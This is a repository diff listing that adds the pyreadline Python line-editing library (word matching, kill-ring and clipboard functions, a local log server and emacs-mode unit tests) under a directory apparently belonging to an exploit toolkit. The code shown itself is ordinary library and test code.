word2.point = PrevWordStart
|
||||
word1.point = PrevWordStart(word2)
|
||||
else:
|
||||
word1.point = PrevWordStart
|
||||
word2.point = NextWordStart
|
||||
stop1 = NextWordEnd(word1)
|
||||
stop2 = NextWordEnd(word2)
|
||||
start1 = word1.point
|
||||
start2 = word2.point
|
||||
self[start2:stop2] = word1[Point:NextWordEnd]
|
||||
self[start1:stop1] = word2[Point:NextWordEnd]
|
||||
self.point = stop2
|
||||
|
||||
|
||||
############ Kill
|
||||
|
||||
def kill_line(self):
|
||||
self.add_to_kill_ring(self[self.point:])
|
||||
del self.line_buffer[self.point:]
|
||||
|
||||
def kill_whole_line(self):
|
||||
self.add_to_kill_ring(self[:])
|
||||
del self[:]
|
||||
|
||||
def backward_kill_line(self):
|
||||
del self[StartOfLine:Point]
|
||||
|
||||
def unix_line_discard(self):
|
||||
del self[StartOfLine:Point]
|
||||
pass
|
||||
|
||||
def kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
del self[Point:NextWordEnd]
|
||||
|
||||
def backward_kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
if not self.delete_selection():
|
||||
del self[PrevWordStart:Point]
|
||||
self.selection_mark = -1
|
||||
|
||||
def forward_kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
if not self.delete_selection():
|
||||
del self[Point:NextWordEnd]
|
||||
self.selection_mark = -1
|
||||
|
||||
def unix_word_rubout(self):
|
||||
if not self.delete_selection():
|
||||
del self[PrevSpace:Point]
|
||||
self.selection_mark = -1
|
||||
|
||||
def kill_region(self):
|
||||
pass
|
||||
|
||||
def copy_region_as_kill(self):
|
||||
pass
|
||||
|
||||
def copy_backward_word(self):
|
||||
pass
|
||||
|
||||
def copy_forward_word(self):
|
||||
pass
|
||||
|
||||
|
||||
def yank(self):
|
||||
self.paste_from_kill_ring()
|
||||
|
||||
def yank_pop(self):
|
||||
pass
|
||||
|
||||
############## Mark
|
||||
|
||||
def set_mark(self):
|
||||
self.mark = self.point
|
||||
|
||||
def exchange_point_and_mark(self):
|
||||
pass
|
||||
|
||||
|
||||
def copy_region_to_clipboard(self): # ()
|
||||
u'''Copy the text in the region to the windows clipboard.'''
|
||||
if self.enable_win32_clipboard:
|
||||
mark = min(self.mark, len(self.line_buffer))
|
||||
cursor = min(self.point, len(self.line_buffer))
|
||||
if self.mark == -1:
|
||||
return
|
||||
begin = min(cursor, mark)
|
||||
end = max(cursor, mark)
|
||||
toclipboard = u"".join(self.line_buffer[begin:end])
|
||||
clipboard.SetClipboardText(toclipboard)
|
||||
|
||||
def copy_selection_to_clipboard(self): # ()
|
||||
u'''Copy the text in the region to the windows clipboard.'''
|
||||
if self.enable_win32_clipboard and self.enable_selection and self.selection_mark >= 0:
|
||||
selection_mark = min(self.selection_mark,len(self.line_buffer))
|
||||
cursor = min(self.point,len(self.line_buffer))
|
||||
if self.selection_mark == -1:
|
||||
return
|
||||
begin = min(cursor, selection_mark)
|
||||
end = max(cursor, selection_mark)
|
||||
toclipboard = u"".join(self.line_buffer[begin:end])
|
||||
clipboard.SetClipboardText(toclipboard)
|
||||
|
||||
|
||||
def cut_selection_to_clipboard(self): # ()
|
||||
self.copy_selection_to_clipboard()
|
||||
self.delete_selection()
|
||||
############## Paste
|
||||
|
||||
|
||||
############## Kill ring
|
||||
def add_to_kill_ring(self,txt):
|
||||
self.kill_ring = [txt]
|
||||
if kill_ring_to_clipboard:
|
||||
clipboard.SetClipboardText(txt.get_line_text())
|
||||
|
||||
|
||||
def paste_from_kill_ring(self):
|
||||
if self.kill_ring:
|
||||
self.insert_text(self.kill_ring[0])
|
||||
|
||||
|
||||
##################################################################
|
||||
q = ReadLineTextBuffer(u"asff asFArw ewrWErhg", point=8)
|
||||
q = TextLine(u"asff asFArw ewrWErhg", point=8)
|
||||
|
||||
def show_pos(buff, pos, chr = u"."):
|
||||
l = len(buff.line_buffer)
|
||||
def choice(bool):
|
||||
if bool:
|
||||
return chr
|
||||
else:
|
||||
return u" "
|
||||
return u"".join([choice(pos==idx) for idx in range(l + 1)])
|
||||
|
||||
|
||||
def test_positioner(buff, points, positioner):
|
||||
print (u" %s "%positioner.__class__.__name__).center(40, u"-")
|
||||
buffstr = buff.line_buffer
|
||||
|
||||
print u'"%s"'%(buffstr)
|
||||
for point in points:
|
||||
b = TextLine(buff, point = point)
|
||||
out=[u" "] * (len(buffstr) + 1)
|
||||
pos = positioner(b)
|
||||
if pos == point:
|
||||
out[pos] = u"&"
|
||||
else:
|
||||
out[point] = u"."
|
||||
out[pos] = u"^"
|
||||
print u'"%s"'%(u"".join(out))
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
print u'%-15s "%s"'%(u"Position", q.get_line_text())
|
||||
print u'%-15s "%s"'%(u"Point", show_pos(q, q.point))
|
||||
|
||||
|
||||
for name, positioner in all_positioners:
|
||||
pos = positioner(q)
|
||||
[]
|
||||
print u'%-15s "%s"'%(name, show_pos(q, pos, u"^"))
|
||||
|
||||
l = ReadLineTextBuffer(u"kjjk asads asad")
|
||||
l.point = EndOfLine
|
||||
102
windows/exploits/ZIBE/pyreadline/lineeditor/wordmatcher.py
Normal file
102
windows/exploits/ZIBE/pyreadline/lineeditor/wordmatcher.py
Normal file
|
|
@ -0,0 +1,102 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
|
||||
import re, operator
|
||||
|
||||
|
||||
def str_find_all(str, ch):
|
||||
result = []
|
||||
index = 0
|
||||
while index >= 0:
|
||||
index = str.find(ch, index)
|
||||
if index >= 0:
|
||||
result.append(index)
|
||||
index += 1
|
||||
return result
|
||||
|
||||
|
||||
word_pattern = re.compile(u"(x*)")
|
||||
|
||||
def markwords(str, iswordfun):
|
||||
markers = {True : u"x", False : u"o"}
|
||||
return "".join([markers[iswordfun(ch)] for ch in str])
|
||||
|
||||
def split_words(str, iswordfun):
|
||||
return [x for x in word_pattern.split(markwords(str,iswordfun)) if x != u""]
|
||||
|
||||
def mark_start_segment(str, is_segment):
|
||||
def mark_start(s):
|
||||
if s[0:1] == u"x":
|
||||
return u"s" + s[1:]
|
||||
else:
|
||||
return s
|
||||
return u"".join(map(mark_start, split_words(str, is_segment)))
|
||||
|
||||
def mark_end_segment(str, is_segment):
|
||||
def mark_start(s):
|
||||
if s[0:1] == u"x":
|
||||
return s[:-1] + u"s"
|
||||
else:
|
||||
return s
|
||||
return u"".join(map(mark_start, split_words(str, is_segment)))
|
||||
|
||||
def mark_start_segment_index(str, is_segment):
|
||||
return str_find_all(mark_start_segment(str, is_segment), u"s")
|
||||
|
||||
def mark_end_segment_index(str, is_segment):
|
||||
return [x + 1 for x in str_find_all(mark_end_segment(str, is_segment), u"s")]
|
||||
|
||||
|
||||
################ Following are used in lineobj ###########################
|
||||
|
||||
def is_word_token(str):
|
||||
return not is_non_word_token(str)
|
||||
|
||||
def is_non_word_token(str):
|
||||
if len(str) != 1 or str in u" \t\n":
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def next_start_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
for start in mark_start_segment_index(str, is_segment):
|
||||
result[len(result):start] = [start for x in range(start - len(result))]
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
def next_end_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
for start in mark_end_segment_index(str, is_segment):
|
||||
result[len(result):start] = [start for x in range(start - len(result))]
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
|
||||
def prev_start_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
prev = 0
|
||||
for start in mark_start_segment_index(str, is_segment):
|
||||
result[len(result):start+1] = [prev for x in range(start - len(result) + 1)]
|
||||
prev=start
|
||||
result[len(result):len(str)] = [prev for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
def prev_end_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
prev = 0
|
||||
for start in mark_end_segment_index(str, is_segment):
|
||||
result[len(result):start + 1] = [prev for x in range(start - len(result) + 1)]
|
||||
prev=start
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
BIN
windows/exploits/ZIBE/pyreadline/logger.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/logger.pyc
Normal file
Binary file not shown.
57
windows/exploits/ZIBE/pyreadline/logserver.py
Normal file
57
windows/exploits/ZIBE/pyreadline/logserver.py
Normal file
|
|
@ -0,0 +1,57 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import cPickle
|
||||
import logging
|
||||
import logging.handlers
|
||||
import SocketServer
|
||||
import struct,socket
|
||||
|
||||
try:
|
||||
import msvcrt
|
||||
except ImportError:
|
||||
msvcrt = None
|
||||
print u"problem"
|
||||
|
||||
|
||||
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
|
||||
host = u'localhost'
|
||||
|
||||
def check_key():
|
||||
if msvcrt is None:
|
||||
return False
|
||||
else:
|
||||
if msvcrt.kbhit() != 0:
|
||||
q = msvcrt.getch()
|
||||
return q
|
||||
return u""
|
||||
|
||||
|
||||
singleline=False
|
||||
|
||||
def main():
|
||||
print u"Starting TCP logserver on port:", port
|
||||
print u"Press q to quit logserver", port
|
||||
print u"Press c to clear screen", port
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
|
||||
s.bind((u"", port))
|
||||
s.settimeout(1)
|
||||
while 1:
|
||||
try:
|
||||
data, addr = s.recvfrom(100000)
|
||||
print data,
|
||||
except socket.timeout:
|
||||
key = check_key().lower()
|
||||
if u"q" == key:
|
||||
print u"Quitting logserver"
|
||||
break
|
||||
elif u"c" == key:
|
||||
print u"\n" * 100
|
||||
|
||||
if __name__ == u"__main__":
|
||||
main()
|
||||
BIN
windows/exploits/ZIBE/pyreadline/modes/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/basemode.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/basemode.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/emacs.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/emacs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/notemacs.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/notemacs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/vi.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/vi.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/release.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/release.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/rlmain.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/rlmain.pyc
Normal file
Binary file not shown.
0
windows/exploits/ZIBE/pyreadline/test/__init__.py
Normal file
0
windows/exploits/ZIBE/pyreadline/test/__init__.py
Normal file
82
windows/exploits/ZIBE/pyreadline/test/common.py
Normal file
82
windows/exploits/ZIBE/pyreadline/test/common.py
Normal file
|
|
@ -0,0 +1,82 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
from pyreadline.modes.emacs import *
|
||||
from pyreadline import keysyms
|
||||
from pyreadline.lineeditor import lineobj
|
||||
from pyreadline.keysyms.common import make_KeyPress_from_keydescr
|
||||
|
||||
import unittest
|
||||
class MockReadline:
|
||||
def __init__ (self):
|
||||
self.l_buffer=lineobj.ReadLineTextBuffer(u"")
|
||||
self._history=history.LineHistory()
|
||||
|
||||
def add_history (self, line):
|
||||
self._history.add_history (lineobj.TextLine (line))
|
||||
|
||||
def _print_prompt (self):
|
||||
pass
|
||||
|
||||
def _bell (self):
|
||||
pass
|
||||
|
||||
def insert_text(self, string):
|
||||
u'''Insert text into the command line.'''
|
||||
self.l_buffer.insert_text(string)
|
||||
|
||||
|
||||
class MockConsole:
|
||||
def __init__ (self):
|
||||
self.bell_count = 0
|
||||
self.text = ''
|
||||
|
||||
def size (self):
|
||||
return (1, 1)
|
||||
|
||||
def cursor(self, visible=None, size=None):
|
||||
pass
|
||||
|
||||
def bell (self):
|
||||
self.bell_count += 1
|
||||
|
||||
def write (self, text):
|
||||
self.text += text
|
||||
|
||||
|
||||
|
||||
|
||||
class Event:
|
||||
def __init__ (self, char):
|
||||
if char==u"escape":
|
||||
self.char=u'\x1b'
|
||||
elif char==u"backspace":
|
||||
self.char=u'\x08'
|
||||
elif char==u"tab":
|
||||
self.char=u'\t'
|
||||
elif char==u"space":
|
||||
self.char=u' '
|
||||
else:
|
||||
self.char = char
|
||||
|
||||
def keytext_to_keyinfo_and_event (keytext):
|
||||
keyinfo = keysyms.common.make_KeyPress_from_keydescr (keytext)
|
||||
if len(keytext) == 3 and keytext[0] == u'"' and keytext[2] == u'"':
|
||||
event = Event (keytext[1])
|
||||
else:
|
||||
event = Event (keyinfo.tuple() [3])
|
||||
return keyinfo, event
|
||||
|
||||
|
||||
|
||||
#override runTests from from main in unittest to remove sys.exit call
|
||||
class Tester(unittest.TestProgram):
|
||||
def runTests(self):
|
||||
if self.testRunner is None:
|
||||
self.testRunner = unittest.TextTestRunner(verbosity=self.verbosity)
|
||||
result = self.testRunner.run(self.test)
|
||||
# sys.exit(not result.wasSuccessful())
|
||||
400
windows/exploits/ZIBE/pyreadline/test/test_emacs.py
Normal file
400
windows/exploits/ZIBE/pyreadline/test/test_emacs.py
Normal file
|
|
@ -0,0 +1,400 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
|
||||
# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
|
||||
import sys, unittest
|
||||
import pdb
|
||||
sys.path.append (u'../..')
|
||||
from pyreadline.modes.emacs import *
|
||||
from pyreadline import keysyms
|
||||
from pyreadline.lineeditor import lineobj
|
||||
|
||||
from common import *
|
||||
from pyreadline.logger import log
|
||||
import pyreadline.logger as logger
|
||||
logger.sock_silent=True
|
||||
logger.show_event=[u"debug"]
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
|
||||
class EmacsModeTest (EmacsMode):
|
||||
tested_commands={}
|
||||
def __init__ (self):
|
||||
EmacsMode.__init__ (self, MockReadline())
|
||||
self.mock_console = MockConsole ()
|
||||
self.init_editing_mode (None)
|
||||
self.lst_completions = []
|
||||
self.completer = self.mock_completer
|
||||
self.completer_delims = u' u'
|
||||
self.tabstop = 4
|
||||
self.mark_directories=False
|
||||
self.show_all_if_ambiguous=False
|
||||
|
||||
def get_mock_console (self):
|
||||
return self.mock_console
|
||||
console = property (get_mock_console)
|
||||
|
||||
def _set_line (self, text):
|
||||
self.l_buffer.set_line (text)
|
||||
|
||||
def get_line (self):
|
||||
return self.l_buffer.get_line_text ()
|
||||
line = property (get_line)
|
||||
|
||||
def get_line_cursor (self):
|
||||
return self.l_buffer.point
|
||||
line_cursor = property (get_line_cursor)
|
||||
|
||||
def input (self, keytext):
|
||||
if keytext[0:1] == u'"' and keytext[-1:] == u'"':
|
||||
lst_key = [u'"%s"' % c for c in keytext[1:-1]]
|
||||
else:
|
||||
lst_key = [keytext]
|
||||
for key in lst_key:
|
||||
keyinfo, event = keytext_to_keyinfo_and_event (key)
|
||||
dispatch_func = self.key_dispatch.get(keyinfo.tuple(),self.self_insert)
|
||||
self.tested_commands[dispatch_func.__name__]=dispatch_func
|
||||
log(u"keydisp: %s %s"%( key,dispatch_func.__name__))
|
||||
dispatch_func (event)
|
||||
self.previous_func=dispatch_func
|
||||
|
||||
def accept_line (self, e):
|
||||
if EmacsMode.accept_line (self, e):
|
||||
# simulate return
|
||||
# self.add_history (self.line)
|
||||
self.l_buffer.reset_line ()
|
||||
|
||||
def mock_completer (self, text, state):
|
||||
return self.lst_completions [state]
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
class TestsKeyinfo (unittest.TestCase):
|
||||
|
||||
def test_keyinfo (self):
|
||||
keyinfo, event = keytext_to_keyinfo_and_event (u'"d"')
|
||||
self.assertEqual (u'd', event.char)
|
||||
keyinfo, event = keytext_to_keyinfo_and_event (u'"D"')
|
||||
self.assertEqual (u'D', event.char)
|
||||
keyinfo, event = keytext_to_keyinfo_and_event (u'"$"')
|
||||
self.assertEqual (u'$', event.char)
|
||||
keyinfo, event = keytext_to_keyinfo_and_event (u'Escape')
|
||||
self.assertEqual (u'\x1b', event.char)
|
||||
|
||||
|
||||
class TestsMovement (unittest.TestCase):
|
||||
def test_cursor (self):
|
||||
r = EmacsModeTest ()
|
||||
self.assertEqual (r.line, u'')
|
||||
r.input(u'"First Second Third"')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Control-a')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'Control-e')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Home')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 1)
|
||||
r.input(u'Ctrl-f')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Ctrl-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 5)
|
||||
r.input(u'Ctrl-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 12)
|
||||
r.input(u'Ctrl-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Ctrl-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Ctrl-Left')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 13)
|
||||
r.input(u'Ctrl-Left')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 6)
|
||||
r.input(u'Ctrl-Left')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'Ctrl-Left')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
|
||||
|
||||
class TestsDelete (unittest.TestCase):
|
||||
def test_delete (self):
|
||||
r = EmacsModeTest ()
|
||||
self.assertEqual (r.line, u'')
|
||||
r.input(u'"First Second Third"')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Delete')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Left')
|
||||
r.input(u'Left')
|
||||
r.input(u'Delete')
|
||||
self.assertEqual (r.line, u'First Second Thid')
|
||||
self.assertEqual (r.line_cursor, 16)
|
||||
r.input(u'Delete')
|
||||
self.assertEqual (r.line, u'First Second Thi')
|
||||
self.assertEqual (r.line_cursor, 16)
|
||||
r.input(u'Backspace')
|
||||
self.assertEqual (r.line, u'First Second Th')
|
||||
self.assertEqual (r.line_cursor, 15)
|
||||
r.input(u'Home')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
self.assertEqual (r.line, u'First Second Th')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Backspace')
|
||||
self.assertEqual (r.line, u'Frst Second Th')
|
||||
self.assertEqual (r.line_cursor, 1)
|
||||
r.input(u'Backspace')
|
||||
self.assertEqual (r.line, u'rst Second Th')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'Backspace')
|
||||
self.assertEqual (r.line, u'rst Second Th')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'Escape')
|
||||
self.assertEqual (r.line, u'')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
|
||||
def test_delete_word (self):
|
||||
r = EmacsModeTest ()
|
||||
self.assertEqual (r.line, u'')
|
||||
r.input(u'"First Second Third"')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
r.input(u'Control-Backspace')
|
||||
self.assertEqual (r.line, u'First Second ')
|
||||
self.assertEqual (r.line_cursor, 13)
|
||||
r.input(u'Backspace')
|
||||
r.input(u'Left')
|
||||
r.input(u'Left')
|
||||
self.assertEqual (r.line, u'First Second')
|
||||
self.assertEqual (r.line_cursor, 10)
|
||||
r.input(u'Control-Backspace')
|
||||
self.assertEqual (r.line, u'First nd')
|
||||
self.assertEqual (r.line_cursor, 6)
|
||||
r.input(u'Escape')
|
||||
self.assertEqual (r.line, u'')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
r.input(u'"First Second Third"')
|
||||
r.input(u'Home')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
r.input(u'Control-Delete')
|
||||
self.assertEqual (r.line, u'FiSecond Third')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Control-Delete')
|
||||
self.assertEqual (r.line, u'FiThird')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Control-Delete')
|
||||
self.assertEqual (r.line, u'Fi')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Control-Delete')
|
||||
self.assertEqual (r.line, u'Fi')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input(u'Escape')
|
||||
self.assertEqual (r.line, u'')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
|
||||
|
||||
|
||||
class TestsSelectionMovement (unittest.TestCase):
|
||||
def test_cursor (self):
|
||||
r = EmacsModeTest ()
|
||||
self.assertEqual (r.line, u'')
|
||||
r.input(u'"First Second Third"')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 18)
|
||||
self.assertEqual (r.l_buffer.selection_mark, -1)
|
||||
r.input(u'Home')
|
||||
r.input(u'Shift-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 1)
|
||||
self.assertEqual (r.l_buffer.selection_mark, 0)
|
||||
r.input(u'Shift-Control-Right')
|
||||
self.assertEqual (r.line, u'First Second Third')
|
||||
self.assertEqual (r.line_cursor, 5)
|
||||
self.assertEqual (r.l_buffer.selection_mark, 0)
|
||||
r.input(u'"a"')
|
||||
self.assertEqual (r.line, u'a Second Third')
|
||||
self.assertEqual (r.line_cursor, 1)
|
||||
self.assertEqual (r.l_buffer.selection_mark, -1)
|
||||
r.input(u'Shift-End')
|
||||
self.assertEqual (r.line, u'a Second Third')
|
||||
self.assertEqual (r.line_cursor, 14)
|
||||
self.assertEqual (r.l_buffer.selection_mark, 1)
|
||||
r.input(u'Delete')
|
||||
self.assertEqual (r.line, u'a')
|
||||
self.assertEqual (r.line_cursor, 1)
|
||||
self.assertEqual (r.l_buffer.selection_mark, -1)
|
||||
|
||||
|
||||
|
||||
class TestsHistory (unittest.TestCase):
|
||||
def test_history_1 (self):
|
||||
r = EmacsModeTest ()
|
||||
r.add_history (u'aa')
|
||||
r.add_history (u'bbb')
|
||||
self.assertEqual (r.line, u'')
|
||||
r.input (u'Up')
|
||||
self.assertEqual (r.line, u'bbb')
|
||||
self.assertEqual (r.line_cursor, 3)
|
||||
r.input (u'Up')
|
||||
self.assertEqual (r.line, u'aa')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input (u'Up')
|
||||
self.assertEqual (r.line, u'aa')
|
||||
self.assertEqual (r.line_cursor, 2)
|
||||
r.input (u'Down')
|
||||
self.assertEqual (r.line, u'bbb')
|
||||
self.assertEqual (r.line_cursor, 3)
|
||||
r.input (u'Down')
|
||||
self.assertEqual (r.line, u'')
|
||||
self.assertEqual (r.line_cursor, 0)
|
||||
|
||||
def test_history_2 (self):
|
||||
r = EmacsModeTest ()
|
||||
r.add_history (u'aaaa')
|
||||
r.add_history (u'aaba')
|
||||
r.add_history (u'aaca')
|
||||
r.add_history (u'akca')
|
||||
r.add_history (u'bbb')
|
||||
r.add_history (u'ako')
|
||||
self.assert_line(r,'',0)
|
||||
r.input (u'"a"')
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'ako',1)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'akca',1)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'aaca',1)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'aaba',1)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'aaaa',1)
|
||||
r.input (u'Right')
|
||||
self.assert_line(r,'aaaa',2)
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'aaba',2)
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'aaca',2)
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'aaca',2)
|
||||
r.input (u'Left')
|
||||
r.input (u'Left')
|
||||
r.input (u'Down')
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'bbb',3)
|
||||
r.input (u'Left')
|
||||
self.assert_line(r,'bbb',2)
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'bbb',2)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'bbb',2)
|
||||
|
||||
|
||||
def test_history_3 (self):
|
||||
r = EmacsModeTest ()
|
||||
r.add_history (u'aaaa')
|
||||
r.add_history (u'aaba')
|
||||
r.add_history (u'aaca')
|
||||
r.add_history (u'akca')
|
||||
r.add_history (u'bbb')
|
||||
r.add_history (u'ako')
|
||||
self.assert_line(r,'',0)
|
||||
r.input (u'')
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'ako',3)
|
||||
r.input (u'Down')
|
||||
self.assert_line(r,'',0)
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'ako',3)
|
||||
|
||||
def test_history_3 (self):
|
||||
r = EmacsModeTest ()
|
||||
r.add_history (u'aaaa')
|
||||
r.add_history (u'aaba')
|
||||
r.add_history (u'aaca')
|
||||
r.add_history (u'akca')
|
||||
r.add_history (u'bbb')
|
||||
r.add_history (u'ako')
|
||||
self.assert_line(r,'',0)
|
||||
r.input (u'k')
|
||||
r.input (u'Up')
|
||||
self.assert_line(r,'k',1)
|
||||
|
||||
def test_complete (self):
|
||||
import rlcompleter
|
||||
logger.sock_silent = False
|
||||
|
||||
log("-" * 50)
|
||||
r = EmacsModeTest()
|
||||
completerobj = rlcompleter.Completer()
|
||||
def _nop(val, word):
|
||||
return word
|
||||
completerobj._callable_postfix = _nop
|
||||
r.completer = completerobj.complete
|
||||
r._bind_key("tab", r.complete)
|
||||
r.input(u'"exi(ksdjksjd)"')
|
||||
r.input(u'Control-a')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
r.input(u'Tab')
|
||||
self.assert_line(r, u"exit(ksdjksjd)", 4)
|
||||
|
||||
r.input(u'Escape')
|
||||
r.input(u'"exi"')
|
||||
r.input(u'Control-a')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
r.input(u'Right')
|
||||
r.input(u'Tab')
|
||||
self.assert_line(r, u"exit", 4)
|
||||
|
||||
|
||||
|
||||
def assert_line(self,r,line,cursor):
|
||||
self.assertEqual (r.line, line)
|
||||
self.assertEqual (r.line_cursor, cursor)
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
# utility functions
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
if __name__ == u'__main__':
|
||||
Tester()
|
||||
tested=EmacsModeTest.tested_commands.keys()
|
||||
tested.sort()
|
||||
# print " Tested functions ".center(60,"-")
|
||||
# print "\n".join(tested)
|
||||
# print
|
||||
|
||||
all_funcs=dict([(x.__name__,x) for x in EmacsModeTest().key_dispatch.values()])
|
||||
all_funcs=all_funcs.keys()
|
||||
not_tested=[x for x in all_funcs if x not in tested]
|
||||
not_tested.sort()
|
||||
print " Not tested functions ".center(60,"-")
|
||||
print "\n".join(not_tested)
|
||||
|
||||
|
||||
148
windows/exploits/ZIBE/pyreadline/test/test_history.py
Normal file
148
windows/exploits/ZIBE/pyreadline/test/test_history.py
Normal file
|
|
